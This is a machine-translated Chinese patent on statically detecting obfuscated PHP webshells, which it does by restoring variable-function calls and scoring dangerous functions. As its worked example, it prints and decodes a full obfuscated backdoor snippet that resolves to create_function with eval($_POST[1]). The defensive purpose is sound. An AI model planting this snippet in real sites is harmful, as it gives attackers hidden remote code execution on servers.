CN107341399A - Assess the method and device of code file security - Google Patents
Assess the method and device of code file security Download PDFInfo
- Publication number
- CN107341399A CN107341399A CN201610282740.8A CN201610282740A CN107341399A CN 107341399 A CN107341399 A CN 107341399A CN 201610282740 A CN201610282740 A CN 201610282740A CN 107341399 A CN107341399 A CN 107341399A
- Authority
- CN
- China
- Prior art keywords
- token
- function
- variable
- code file
- expression
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/55—Detecting local intrusion or implementing counter-measures
- G06F21/56—Computer malware detection or handling, e.g. anti-virus arrangements
- G06F21/562—Static detection
- G06F21/563—Static detection by source code analysis
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Virology (AREA)
- Health & Medical Sciences (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- General Health & Medical Sciences (AREA)
- Machine Translation (AREA)
- Information Retrieval, Db Structures And Fs Structures Therefor (AREA)
Abstract
The invention discloses a kind of method and device for assessing code file security.Wherein, this method includes:Variable function and assignment expression are parsed from code file to be detected;Restored according to variable function and assignment expression and directly invoke function and original call function;The security of code file is assessed by default safety coefficient corresponding with directly invoking function and default safety coefficient corresponding with original call function.The safety detection scheme detection efficiency for webshell code files that the present invention is solved provided in correlation technique is relatively low, the not high technical problem of accuracy.
Description
Technical field
The present invention relates to computer software fields, in particular to a kind of method for assessing code file security and
Device.
Background technology
" web " is meant that server opens web services, and " shell " is meant that acquirement to server to a certain degree
Upper operating right.Webshell is typically a kind of existing in the form of the web page files such as asp, php, jsp or cgl
Order performing environment, a kind of webpage back door can also be referred to as.Hacker attacks person is after a website is invaded, generally
Asp or php backdoor files and the normal web page files under Website server web catalogues can be mixed, Ran Houbian
Asp or php back doors can be accessed using browser, to reach the purpose of control Website server.
Due to webshell, it is occurred in the form of dynamic script mostly, and it is substantially also a page of website,
But because far beyond one page of its function allows the scope of operation, it is included in system layer and performs one or more
Individual operation, and these operating rights often only have webmaster just to possess, and therefore, are generally referred to as website again
Backdoor Tools.
Morphological analysis be in computer science by character string be converted to word (Token, its be programming language in minimum
Element) sequence process.Lexical analysis phase is the first stage of compilation process, and it is the basis of compiling.This
The task in stage is from left to right to read in source program character by character, i.e. the character stream for forming source program is scanned,
Then word (also known as word symbol or symbol) is identified according to word-building rule.Morphology parsing core missions be scanning,
Identify word and the word to identifying provides qualitative, fixed length processing.
Php supports the concept of variable function.If this means there is round parentheses after a variable name, php will find with
The value of variable function of the same name, and will attempt to perform it.Variable function cannot be used for language construction, such as:Echo (),
Print (), unset (), isset (), empty (), include (), require () and similar sentence, its
Need to use the shell function of itself that these structures are used as into variable function.
In the last few years, with the rapid development of Internet technology, incident is that hacker is directed to the attack of website not
Disconnected increase.National Internet emergency response centers are provided《China Internet network security report in 2014》Show,
Whole year in 2014 has 40186 websites to be implanted back door within the border in China, wherein, including government website 1529.
Hacker often uploads webshell to the hidden catalogue of website after using web leak success attacks, so as to obtain to net
The lasting control stood, and most of webshell connection is all similar with normal website visiting, passes through browser
And 80 ports of HTTP (HTTP) are transmitted data, disguised high, traditional fire wall no record.
And according to the statistics of w3techs websites, by the end of on January 24th, 2016, php in the programming language of global website
81.7% has been accounted for, has been occupied by the webshell for the website write for php language corresponding to it based on this
Proportion also significantly increases.
Because webshell needs to explain execution by corresponding script, morphology parsing can be carried out before execution,
By code analysis into word one by one (mark), while assign this word and specifically act on, this is programming language most base
This component units, that is, token.
At present, provided in correlation technique it is a kind of for php webshall based on virtual machine come the dynamic detection realized
Technology, its specific implementation process are that code file is carried out into morphology, syntax parsing first, are produced after completion to be resolved
Middle layer identification code, then explain on a virtual machine and perform the intermediate code that back obtains, and utilize in the process of implementation
Built-in function storehouse and abnormal behaviour rule base are analyzed middle behavior, judge whether it is malice with this
Webshell codes.
However, because this dynamic web shell detection techniques need to perform using virtual machine dynamic analog, in detection
During time for consuming it is longer, it can not only accomplish really to understand semantic, nor can accomplish that real-time is examined
Survey;Moreover, the webshell of currently the majority can add password and operational factor, if not specifying parameter
Or password, the technology of virtual machine dynamic detection can not judge whether code is malice at all, this is also current virtual machine examination
Survey technology is difficult to the wide gap gone beyond.
In addition, existing static webshell detection techniques usually require to judge script using the mode of condition code matching
File whether be malice webshell.Such a method needs to carry out the feature in the script and feature database in website sternly
The string matching of lattice, if finding feature string in script, determine that it is the webshell of malice;Similar,
Expressive Features code can also be carried out using regular expression, but essence is also to be to rely on condition code, so current is quiet
State webshell detection techniques equally exist following defect:To whether be malice webshell determination rate of accuracy compared with
It is low, to manslaughter rate higher, and feature database is huge and needs staff constantly to collect sample extraction condition code at any time, especially
It is the PHP variable functions for deformation, relies only on feature database to complete to judge substantially complete malice
Webshell detections.
For it is above-mentioned the problem of, not yet propose effective solution at present.
The content of the invention
The embodiments of the invention provide a kind of method and device for assessing code file security, at least to solve related skill
The safety detection scheme detection efficiency for webshell code files provided in art is relatively low, and accuracy is not high
Technical problem.
One side according to embodiments of the present invention, there is provided a kind of method for assessing code file security, including:
Variable function and assignment expression are parsed from code file to be detected;According to variable function and assignment table
Restored up to formula and directly invoke function and original call function;Corresponding with directly invoking function it is safely by default
Number and default safety coefficient corresponding with original call function are assessed the security of code file.
Alternatively, variable function and assignment expression are parsed from code file to be included:Word is carried out to code file
Method is analyzed, and the character string in code file is converted into Token sequences;Variable letter is parsed from Token sequences
Number and assignment expression.
Alternatively, parsing variable function from Token sequences includes:Finding step:Token is traveled through according to preset order
Each Token in sequence, lookup classification are operator, and value is the first Token of left round parentheses;Judgment step:
In the case where finding the first Token, the Token of the previous traversal adjacent with the first Token classification is judged
Whether it is variable;If it is, it is operator to begin look for classification from the first Token, value is the of right round parentheses
Two Token, and the parameter sets between the first Token and the 2nd Token are matched with default regular expression
In the case of, by current lookup to function be recorded as variable function, finding step is returned to, until parsing variable letter
Number.
Alternatively, parsing assignment expression from Token sequences includes:Finding step:Traveled through according to preset order
Each Token in Token sequences, lookup classification are operator, and value is the 3rd Token of equal sign;Obtaining step:
In the case where finding the 3rd Token, the Token of the previous traversal adjacent with the 3rd Token is obtained, and will
The Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;From the 3rd Token
It is operator to begin look for classification, and value is the 4th Token of branch, obtain the 3rd Token and the 4th Token it
Between one or more Token, and by one or more Token be recorded as current lookup to assignment expression in treat
The expression formula of calculating, finding step is returned to, until parsing assignment expression.
Alternatively, restored according to variable function and assignment expression and directly invoke function and original call function and include:
Searched from default transcoding rule and directly invoke function with what variable function matched;Calculate in assignment expression and every
Value corresponding to the variable of individual assignment expression, and established between the variable of each assignment expression and corresponding value
Corresponding relation;Original call function is identified from directly invoking using default transcoding rule and corresponding relation in function.
Alternatively, by safety coefficient corresponding with directly invoking function and corresponding with original call function it is safely
Several securities to code file, which carry out assessment, to be included:Peace corresponding with directly invoking function is read from default storage region
Overall coefficient and safety coefficient corresponding with original call function;Pair safety coefficient corresponding with directly invoking function and
Safety coefficient corresponding with original call function carries out summation operation, obtains safety evaluation result.
Another aspect according to embodiments of the present invention, additionally provide another method for assessing code file security, bag
Include:
Variable function is parsed from code file to be detected;Restored according to variable function and directly invoke function;It is logical
Default safety coefficient corresponding with directly invoking function is crossed to assess the security of code file.
Another aspect according to embodiments of the present invention, there is provided a kind of device for assessing code file security, including:
Parsing module, for parsing variable function and assignment expression from code file to be detected;Reduce mould
Block, function and original call function are directly invoked for being restored according to variable function and assignment expression;Evaluation module,
For passing through default safety coefficient corresponding with directly invoking function and default safety corresponding with original call function
Coefficient is assessed the security of code file.
Alternatively, parsing module includes:Converting unit, for carrying out morphological analysis to code file, by code file
In character string be converted to Token sequences;Resolution unit, for parsed from Token sequences variable function with
And assignment expression.
Alternatively, resolution unit includes:First searches subelement, for being traveled through according to preset order in Token sequences
Each Token, lookup classification is operator, and value is the first Token of left round parentheses;Judgment sub-unit, it is used for
In the case where finding the first Token, the Token of the previous traversal adjacent with the first Token classification is judged
Whether it is variable;First parsing subelement, for when judgment sub-unit output is is, being looked into since the first Token
It is operator to look for classification, and value is the 2nd Token of right round parentheses, and by between the first Token and the 2nd Token
Parameter sets and default regular expression match in the case of, by current lookup to function be recorded as variable letter
Number, return to first and search subelement, until parsing variable function.
Alternatively, resolution unit includes:Second searches subelement, for being traveled through according to preset order in Token sequences
Each Token, lookup classification is operator, and value is the 3rd Token of equal sign;Subelement is obtained, for looking into
In the case of finding the 3rd Token, the Token of the previous traversal adjacent with the 3rd Token is obtained, and will obtain
To Token value be recorded as current lookup to assignment expression in treat the variable of assignment;Second parsing subelement,
It is operator for beginning look for classification from the 3rd Token, value is the 4th Token of branch, obtains the 3rd Token
With one or more Token between the 4th Token, and one or more Token are recorded as what current lookup arrived
Expression formula to be calculated in assignment expression, return to second and search subelement, until parsing assignment expression.
Alternatively, recovery module includes:First reduction unit, for lookup and variable function from default transcoding rule
What is matched directly invokes function;Processing unit, for calculating the change in assignment expression with each assignment expression
Value corresponding to amount, and establish corresponding relation between the variable of each assignment expression and corresponding value;Second also
Former unit, for identifying original call function in function from directly invoking using default transcoding rule and corresponding relation.
Alternatively, evaluation module includes:Reading unit, for reading from default storage region and directly invoking function pair
The safety coefficient and safety coefficient corresponding with original call function answered;Computing unit, for pair with directly invoke letter
Safety coefficient corresponding to number and safety coefficient corresponding with original call function carry out summation operation, obtain security and comment
Estimate result.
Another further aspect according to embodiments of the present invention, additionally provide another device for assessing code file security, bag
Include:
Parsing module, for parsing variable function from code file to be detected;Recovery module, for according to change
Flow function, which restores, directly invokes function;Evaluation module, for passing through default safety corresponding with directly invoking function
Coefficient is assessed the security of code file.
In embodiments of the present invention, using parsing variable function and assignment expression from code file to be detected
Mode, restored according to variable function and assignment expression and directly invoke function and original call function and by default
Safety coefficient corresponding with directly invoking function and default safety coefficient corresponding with original call function to code text
The security of part is assessed, it is achieved thereby that improving the detection efficiency of variable function type webshell code files, is carried
The technique effect of testing result accuracy is risen, and then is solved literary for webshell codes provided in correlation technique
The safety detection scheme detection efficiency of part is relatively low, the not high technical problem of accuracy.
Brief description of the drawings
Accompanying drawing described herein is used for providing a further understanding of the present invention, forms the part of the application, this hair
Bright schematic description and description is used to explain the present invention, does not form inappropriate limitation of the present invention.In accompanying drawing
In:
Fig. 1 is a kind of hardware configuration of the terminal of the method for assessment code file security of the embodiment of the present invention
Block diagram;
Fig. 2 is the flow chart of the method for assessment code file security according to embodiments of the present invention;
Fig. 3 is the flow chart of another method for assessing code file security according to embodiments of the present invention;
Fig. 4 is a kind of structured flowchart of the device of assessment code file security according to embodiments of the present invention;
Fig. 5 is a kind of structured flowchart of device for assessing code file security according to the preferred embodiment of the invention;
Fig. 6 is the structured flowchart of another device for assessing code file security according to embodiments of the present invention;
Fig. 7 is a kind of structured flowchart of terminal according to embodiments of the present invention.
Embodiment
In order that those skilled in the art more fully understand the present invention program, below in conjunction with the embodiment of the present invention
Accompanying drawing, the technical scheme in the embodiment of the present invention is clearly and completely described, it is clear that described embodiment
The only embodiment of a present invention part, rather than whole embodiments.Based on the embodiment in the present invention, ability
The every other embodiment that domain those of ordinary skill is obtained under the premise of creative work is not made, should all belong to
The scope of protection of the invention.
It should be noted that term " first " in description and claims of this specification and above-mentioned accompanying drawing, "
Two " etc. be for distinguishing similar object, without for describing specific order or precedence.It should be appreciated that this
The data that sample uses can exchange in the appropriate case, so as to embodiments of the invention described herein can with except
Here the order beyond those for illustrating or describing is implemented.In addition, term " comprising " and " having " and they
Any deformation, it is intended that cover it is non-exclusive include, for example, containing the process of series of steps or unit, side
Method, system, product or equipment are not necessarily limited to those steps clearly listed or unit, but may include unclear
It is that ground is listed or for the intrinsic other steps of these processes, method, product or equipment or unit.
The explanation of nouns that the present invention relates to is as follows:
(1) variable function typically refers to the function concept that PHP is supported, if having round parentheses after a variable name, that
PHP will find the function of the same name with the value of variable, and attempt to perform the function searched out;
(2) assignment expression refers to variable is connected with expression formula by equal sign, by calculating on the right side of assignment operator
The value of expression formula, then the value of assignment operator right-hand side expression is assigned to the variable in left side, so that assignment expression is left
Value of the value of the variable of side as expression formula;
(3) function is directly invoked to refer to according to default transcoding rule be led to according to the variable function parsed from code file
Cross the function without transcoding that the mode directly invoked restores;
Such as:" $ _ uU=chr (99) .chr (104) .chr (114) " can be restored directly according to ASCII character transcoding rule
Connecing call function is:chr;
(4) original call function refer to according to the variable function that is parsed from code file and assignment expression according to
The function without transcoding that default transcoding rule is restored by way of recalling (iteration) and calling;
Such as:" $ _ uU=chr (99) .chr (104) .chr (114) " can be restored directly according to ASCII character transcoding rule
Connecing call function is:chr;
" $ _ fF=$ _ uU (99) $ _ uU (114) $ _ uU (101) $ _ uU (97) $ _ uU (116) $ _ uU (101) $ _ uU (
95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$
_ uU (110) " can restore according to ASCII character transcoding rule to be directly invoked function and is:create_function;
" $ _ cC=$ _ uU (101) $ _ uU (118) $ _ uU (97) $ _ uU (108) $ _ uU (40) $ _ uU (36) $ _ uU (9
5).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41)
$ _ uU (59) " can restore according to ASCII character transcoding rule to be directly invoked function and is:eval($_POST[1]);
Finally give with $ _=$ _ fF (" ", $ _ cC) corresponding to original call function be:create_function
("",eval($_POST[1])。
(5) what transcoding rule referred to pre-establish is converted to implementing for another form by code from a kind of form
Standard.
(6) safety coefficient refers to analyze the obtained level of security of common mathematical function or the danger of dangerous function according to long-time statistical
Dangerous rank;
(7) assess and refer to judge whether the code file is webshell that invader (or attacker) malice uploads
File.
Embodiment 1
According to embodiments of the present invention, a kind of embodiment of the method for assessing code file security is additionally provided, it is necessary to illustrate
, can be in the computer system of such as one group computer executable instructions the flow of accompanying drawing illustrates the step of
Perform, although also, show logical order in flow charts, in some cases, can be with different from this
The order at place performs shown or described step.
The embodiment of the method that the embodiment of the present application one is provided can be in mobile terminal, terminal or similar fortune
Calculate and performed in device.Exemplified by running on computer terminals, Fig. 1 is that a kind of of the embodiment of the present invention assesses code text
The hardware block diagram of the terminal of the method for part security.As shown in figure 1, terminal 10 can include
(processor 102 can include but is not limited to microprocessor to one or more (one is only shown in figure) processors 102
MCU or PLD FPGA etc. processing unit), the memory 104 for data storage and for leading to
The transmitting device 106 of telecommunication function.It will appreciated by the skilled person that the structure shown in Fig. 1 is only to illustrate,
It does not cause to limit to the structure of above-mentioned electronic installation.For example, terminal 10 may also include than shown in Fig. 1
More either less components have the configuration different from shown in Fig. 1.
Memory 104 can be used for the software program and module of storage application software, such as the assessment in the embodiment of the present invention
Programmed instruction/module corresponding to the method for code file security, processor 102 are stored in memory 104 by operation
Interior software program and module, so as to perform various function application and data processing, that is, realize above-mentioned assessment generation
The method of code file security.Memory 104 may include high speed random access memory, may also include nonvolatile memory,
Such as one or more magnetic storage device, flash memory or other non-volatile solid state memories.In some instances,
Memory 104 can further comprise relative to the remotely located memory of processor 102, and these remote memories can be with
Pass through network connection to terminal 10.The example of above-mentioned network include but is not limited to internet, intranet,
LAN, mobile radio communication and combinations thereof.
Transmitting device 106 is used to data are received or sent via a network.Above-mentioned network instantiation may include
The wireless network that the communication providerses of terminal 10 provide.In an example, transmitting device 106 includes one
Network adapter (Network Interface Controller, referred to as NIC), it can pass through base station and other nets
Network equipment is connected so as to be communicated with internet.In an example, transmitting device 106 can be radio frequency (Radio
Frequency, referred to as RF) module, it is used to wirelessly be communicated with internet.
Under above-mentioned running environment, this application provides the method for assessment code file security as shown in Figure 2.Figure
2 be the flow chart of the method for assessment code file security according to embodiments of the present invention.As shown in Fig. 2 this method
Following processing step can be included:
Step S22:Variable function and assignment expression are parsed from code file to be detected;
Step S24:Restored according to variable function and assignment expression and directly invoke function and original call function;
Step S26:Pass through default safety coefficient corresponding with directly invoking function and default and original call function
Corresponding safety coefficient is assessed the security of code file.
The technical scheme that the embodiment of the present invention is provided can apply to the webshell Static Detections of PHP scripts.
By the code file write using PHP code is parsed (including:Morphological analysis, semantic analysis), for by
The variable function that character string is spliced is reduced, while directly invokes function and code according to what is restored
Assignment expression in file is carried forward code backtracking, until original call function is restored, to judge code text
Whether webshell common mathematical functions or dangerous function are included in part.Then, then by default with directly invoking function pair
Answer safety coefficient (such as:The harmful grade of common mathematical function or dangerous function) and default and original call function pair
The safety coefficient answered is assessed the security of code file, judge the code file whether be invader (or attack
Person) malice upload webshell files.
It should be noted that the process that the above-mentioned security to code file is assessed can use Lua as realization
Language.Because simulator small volume, the speed of service of Lua language are fast, committed memory is low, compatibility is good, exploitation is fast
The advantages that fast is spent, while the mutual calling of itself and C/C++ language is convenient to, and therefore, is very easy to collection cost hair
The technical scheme that bright embodiment is provided.
Alternatively, in step S22, variable function and assignment expression are parsed from code file to be included
Step performed below:
Step S221:Morphological analysis is carried out to code file, the character string in code file is converted into Token sequences
Row;
Step S222:Variable function and assignment expression are parsed from Token sequences.
The lexer morphology that Lua can be used for reference by lexical analyzer parses storehouse and PHP zend module morphological analyses
Identifier, annotation, numeral, PHP keywords, variable, operator are extracted respectively from the source program in code file
And spcial character carries out canonical matching, and then all Token are carried according to sequencing from original code file
Composition Tokens arrays are taken out, lexical analyzer exports word symbol and may generally be expressed as following dualistic formula:
(word types, word property value);
Wherein, because keyword is that have the identifier for fixing meaning by what program language defined, so keyword is usual
It is not used as general identifier;Identifier can be used for representing various titles, such as:Name variable, array title,
Function name, process title;The type of constant can include but is not limited to:Integer, full mold, Boolean type, character type;
The type of operator can include but is not limited to:+、-、*、/.
Assuming that the code segment intercepted in code file to be detected is as follows:
<$ _ uU=chr (99) .chr (104) .chr (114);$ _ cC=$ _ uU (101) $ _ uU (118) $ _ uU (97) $ _ u
U(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU
(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$ _ fF=$ _ uU (99) $ _ uU (114) $ _ uU (101)
.$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(
99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$ _=$ _ fF (" ", $ _ cC);@$_();>
With code line " $ _ uU=chr (99) .chr (104) .chr (114);" exemplified by carry out the obtained result of morphological analysis such as
Shown in table 1:
Table 1
Classification | Property value |
Variable | $_uU |
Operator | = |
Identifier | chr |
Operator | ( |
Numeral | 99 |
Operator | ) |
Operator | . |
Identifier | chr |
Operator | ( |
Numeral | 104 |
Operator | ) |
Operator | . |
Identifier | chr |
Operator | ( |
Numeral | 114 |
Operator | ) |
Operator | ; |
Character string can be converted into Token sequences by above-mentioned code segment according to reformulationses as shown in table 1, from
Variable function and assignment expression are parsed in Token sequences.
Alternatively, in step S222, variable function is parsed from Token sequences can include step performed below:
Step S2221:Each Token in Token sequences is traveled through according to preset order, lookup classification is operator,
Value is the first Token of left round parentheses;
Step S2222:In the case where finding the first Token, previous time adjacent with the first Token is judged
Whether the Token gone through classification is variable;
Step S2223:If it is, it is operator to begin look for classification from the first Token, value is right round parentheses
The 2nd Token, and by the parameter sets between the first Token and the 2nd Token and default regular expression phase
In the case of matching, by current lookup to function be recorded as variable function, return to step S2221, until parsing
Variable function.
After above-mentioned Tokens arrays are obtained by morphological analysis, can according to preset order (such as:According to morphology point
The order that parser is analyzed code file) successively travel through Tokens arrays in each Token.Due to function
Calling needs to use round parentheses (i.e. " () "), therefore, it is necessary first to which it is operator to search classification, and value is left circle
The Tokens [i] of bracket (i.e. " (") (equivalent to above-mentioned first Token);Secondly, classification is being found as operation
Symbol, value is the Tokens [i] of left round parentheses (i.e. " (") and then the Token [i-1] for further obtaining previous traversal
Classification whether be variable;Then, if Token [i-1] classification is variable, classification is continued to search for as operation
Symbol, value are the Tokens [i+n] (equivalent to above-mentioned 2nd Token, n is positive integer) of right round parentheses, and by the
, will be current in the case that parameter sets between one Token and the 2nd Token match with default regular expression
The function found is recorded as variable function, wherein, as long as above-mentioned parameter set can meet PHP regular expressions
Matched rule.Such as:Parameter sets can include but is not limited at least one of:Alphabetical, digital, lower stroke
Line, additional character (such as:$), user accesses the parameter of PHP webpages transmission.
If it should be noted that when $ and at least one letter, numeral, underscore three simultaneously be present, need
Started with $, such as:$ _ POST [' aaa '], if not using $ as beginning, then obtained parameter sets will not be inconsistent
The matched rule for stating PHP regular expressions is closed, such as:a$b.
Specific to above-mentioned code segment example, when detecting first " when (", due to " the previous Token of ("
For chr, it is variable that its classification is not for identifier, and therefore, chr (99) is not variable function.When detecting second
It is individual " when (", due to this " the previous Token of (" is chr, and it is variable that its classification is not for identifier, because
This, chr (104) is not variable function.When detecting the 3rd " when (", due to " the previous Token of ("
For chr, it is variable that its classification is not for identifier, and therefore, chr (114) is not variable function.Until when detection
To the 4th " when (", due to this " the previous Token of (" is $ _ uU, and its classification is variable, therefore, it is necessary to
Continue to judge whether 101 at this between " (" and first ") " thereafter meet above-mentioned PHP regular expressions
Matched rule, it is the matched rule for meeting above-mentioned PHP regular expressions, therefore, _ uU (101) by matching numeral 101
The variable function as required to look up, wherein, $ _ uU is variable function title, and 101 be the parameter in variable function.
Similarly, by that analogy, the variable function in above-mentioned code segment can also include:$ _ uU (118), $ _ uU (97),
$ _ uU (108), $ _ uU (40), $ _ uU (36), _ uU (95) $ _ uU (80), $ _ uU (79) $ _ uU (83), $ _ uU (84),
$ _ uU (91), $ _ uU (49), $ _ uU (93), $ _ uU (41), $ _ uU (59), $ _ uU (99), $ _ uU (114), $ _ uU (101)
$ _ uU (97), $ _ uU (116), $ _ uU (101), $ _ uU (95), $ _ uU (102), $ _ uU (117), $ _ uU (110),
$ _ uU (99), $ _ uU (116), $ _ uU (105), $ _ uU (111), $ _ uU (110), $ _ fF (" ", $ _ cC).
Alternatively, in step S222, assignment expression is parsed from Token sequences can include step performed below
Suddenly:
Step S2224:Each Token in Token sequences is traveled through according to preset order, lookup classification is operator,
Value is the 3rd Token of equal sign;
Step S2225:In the case where finding the 3rd Token, previous time adjacent with the 3rd Token is obtained
The Token gone through, and by the Token got value be recorded as current lookup to assignment expression in treat assignment
Variable;
Step S2226:It is operator to begin look for classification from the 3rd Token, and value is the 4th Token of branch, is obtained
One or more Token between the 3rd Token and the 4th Token are taken, and one or more Token are recorded as
Current lookup to assignment expression in expression formula to be calculated, return to step S2224, until parsing assignment expression
Formula.
After above-mentioned Tokens arrays are obtained by morphological analysis, it is with obtaining variable function difference:Assignment table
Mainly realized up to formula by equal sign (=).Therefore, can according to preset order (such as:According to lexical analyzer pair
The order that code file is analyzed) successively travel through Tokens arrays in each Token.Due to assignment expression
Equal sign (i.e. "=") is needed to use, therefore, it is necessary first to which it is operator to search classification, and value is equal sign (i.e. "=")
Tokens [i] (equivalent to above-mentioned 3rd Token);Secondly, the Token [i-1] of previous traversal is further obtained,
And by the Token got value be recorded as current lookup to assignment expression in treat the variable of assignment;Then,
It is operator to continue to search for classification, and for the Tokens [i+n] of branch, (equivalent to above-mentioned 4th Token, n is just to value
Integer), and one or more Token between Tokens [i] and Tokens [i+n] are recorded as what current lookup arrived
Expression formula to be calculated in assignment expression.
Specific to above-mentioned code segment example, when detecting first "=", previous traversal is further obtained
Token [i-1], and the Token got value (i.e. $ _ uU) is recorded as the assignment expression that current lookup arrives
In treat the variable of assignment;Then, it is operator to continue to search for classification, value for ";" Tokens [i+n], and will
One or more Token (i.e. chr (99) .chr (104) .chr (114)) between Tokens [i] and Tokens [i+n]
Be recorded as current lookup to assignment expression in expression formula to be calculated.Similarly, by that analogy, it can be found that upper
State and assignment expression as shown in table 2 in code segment be present:
Table 2
Alternatively, in step s 24, restored according to variable function and assignment expression and directly invoke function and original
Call function can include step performed below:
Step S241:Searched from default transcoding rule and directly invoke function with what variable function matched;
Step S242:Value corresponding with the variable of each assignment expression in assignment expression is calculated, and each
Corresponding relation is established between the variable of assignment expression and corresponding value;
Step S243:Original call function is identified from directly invoking using default transcoding rule and corresponding relation in function.
By above-mentioned table 2, "=" in assignment expression " $ _ uU=chr (99) .chr (104) .chr (114) "
The expression formula on the right carries out transcoding (equivalent to above-mentioned default transcoding rule) by ASCII character and obtained.ASCII character
Combined using 7 specified or 8 bits to represent 128 or 256 kind of possible character.Standard ASCII character
Also basic ASCII character is, represents that all upper case and lower cases are alphabetical using 7 bits, numeral 0 to 9,
Punctuation mark, and the Special controlling character used in Americanese (need exist for paying special attention to:ASCII character with
Differentiation in the digit of standard ASCII character, standard ASCII character are 7 binary representations).It is (right by decimal coded
Should) abbreviated character (or function/explanation) it can be seen that, chr (99) corresponds to lowercase " c ", and chr (104) is right
Should be in lowercase " h ", chr (114) corresponds to lowercase " r ", therefore, in the assignment expression, with change
The value for measuring expression formula corresponding to $ _ uU is chr.Similarly, in assignment expression
$ _ fF=$ _ uU (99) $ _ uU (114) $ _ uU (101) $ _ uU (97) $ _ uU (116) $ _ uU (101) $ _ uU (95) $ _
uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(11
0) in, the value of expression formula corresponding with variable $ _ fF is create_function.In assignment expression
$ _ cC=$ _ uU (101) $ _ uU (118) $ _ uU (97) $ _ uU (108) $ _ uU (40) $ _ uU (36) $ _ uU (95) $ _ u
U(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(
59) in, the value of expression formula corresponding with variable $ _ cC is eval ($ _ POST [1]).Finally, in assignment expression
It is create_function with the value of variable $ _ corresponding expression formula in $ _=$ _ fF (" ", $ _ cC)
("",eval($_POST[1])。
By above-mentioned analysis, corresponding relation can be established between the variable of each assignment expression and corresponding value.
Secondly, by assignment expression " $ _ uU=chr (99) .chr (104) .chr (114) " according to ASCII character transcoding rule
It can restore and directly invoke function chr;Then, according to ASCII character transcoding rule and the variable that has built up with
Corresponding relation $ _ → $ _ fF, $ _ cC → $ _ uU between expression formula value recalls successively, until obtaining original call function
Create_function (" ", eval ($ _ POST [1]), wherein, ($ _ POST [1] is represented one as establishment eval
Individual function, for performing HTTP POST code, thus, it is possible to will become apparent from
(" ", eval (_ POST [1]) have despiteful webshell properties to create_function;
Alternatively, in step S26, by safety coefficient corresponding with directly invoking function and with original call letter
Safety coefficient corresponding to number, which carries out assessment to the security of code file, can include step performed below:
Step S262:Corresponding with directly invoking function safety coefficient and and original call are read from default storage region
Safety coefficient corresponding to function;
Step S264:Pair safety coefficient corresponding with directly invoking function and corresponding with original call function it is safely
Number carries out summation operation, obtains safety evaluation result.
According to corresponding with directly invoking function chr safety coefficient set in advance (such as:Default risk score or
Safety scoring) and according to set in advance and original call function create_function
(" ", corresponding to eval ($ _ POST [1]) safety coefficient carry out comprehensive assessment determine code file danger classes (such as:
Ordinary hazard rank, moderate risk rank, high harmful grade), such as:Directly invoke dangerous corresponding to function chr
Score as 1 point, and original call function create_function (comment by " ", danger corresponding to eval ($ _ POST [1])
It is divided into 3 points, the safety evaluation result finally given is:4 points.Above-mentioned code segment category is finally determined by assessing
In high-risk malice webshell files.
In addition, under the running environment shown in Fig. 1, present invention also provides another assessment code as shown in Figure 3
The method of file security.Fig. 3 is another method for assessing code file security according to embodiments of the present invention
Flow chart.As shown in figure 3, this method can include following processing step:
Step S32:Variable function is parsed from code file to be detected;
Step S34:Restored according to variable function and directly invoke function;
Step S36:The security of code file is carried out by default safety coefficient corresponding with directly invoking function
Assess.
Assignment expression can be both included in code file to be detected, naturally it is also possible to not comprising assignment expression.
And it is relatively easy for the PHP code file not comprising assignment expression, its assessment mode, Main Basiss preset transcoding
Rule (such as:ASCII character transcoding rule) restored from PHP code file and directly invoke function.Then, then
The security of code file is assessed using default safety coefficient corresponding with directly invoking function.
During being preferable to carry out, be able to can be used for reference by lexical analyzer Lua lexer morphology parsing storehouse and
PHP zend modules morphological analysis extracts identifier, annotation, numeral, PHP respectively from the source program in code file
Keyword, variable, operator and spcial character carry out canonical matching, and then will be all from original code file
Token extracts composition Tokens arrays according to sequencing.Then, then from Tokens arrays parse change
Flow function.
After above-mentioned Tokens arrays are obtained by morphological analysis, can according to preset order (such as:According to morphology point
The order that parser is analyzed code file) successively travel through Tokens arrays in each Token.Due to function
Calling needs to use round parentheses (i.e. " () "), therefore, it is necessary first to which it is operator to search classification, and value is left circle
The Tokens [i] of bracket (i.e. " (") (equivalent to above-mentioned first Token);Secondly, classification is being found as operation
Symbol, value is the Tokens [i] of left round parentheses (i.e. " (") and then the Token [i-1] for further obtaining previous traversal
Classification whether be variable;Then, if Token [i-1] classification is variable, classification is continued to search for as operation
Symbol, value are the Tokens [i+n] (equivalent to above-mentioned 2nd Token, n is positive integer) of right round parentheses, and by the
, will be current in the case that parameter sets between one Token and the 2nd Token match with default regular expression
The function found is recorded as variable function, wherein, as long as above-mentioned parameter set can meet PHP regular expressions
Matched rule.Such as:Parameter sets can include but is not limited at least one of:Alphabetical, digital, lower stroke
Line, additional character (such as:$), user accesses the parameter of PHP webpages transmission.
If it should be noted that when $ and at least one letter, numeral, underscore three simultaneously be present, need
Started with $, such as:$ _ POST [' aaa '], if not using $ as beginning, then obtained parameter sets will not be inconsistent
The matched rule for stating PHP regular expressions is closed, such as:a$b.
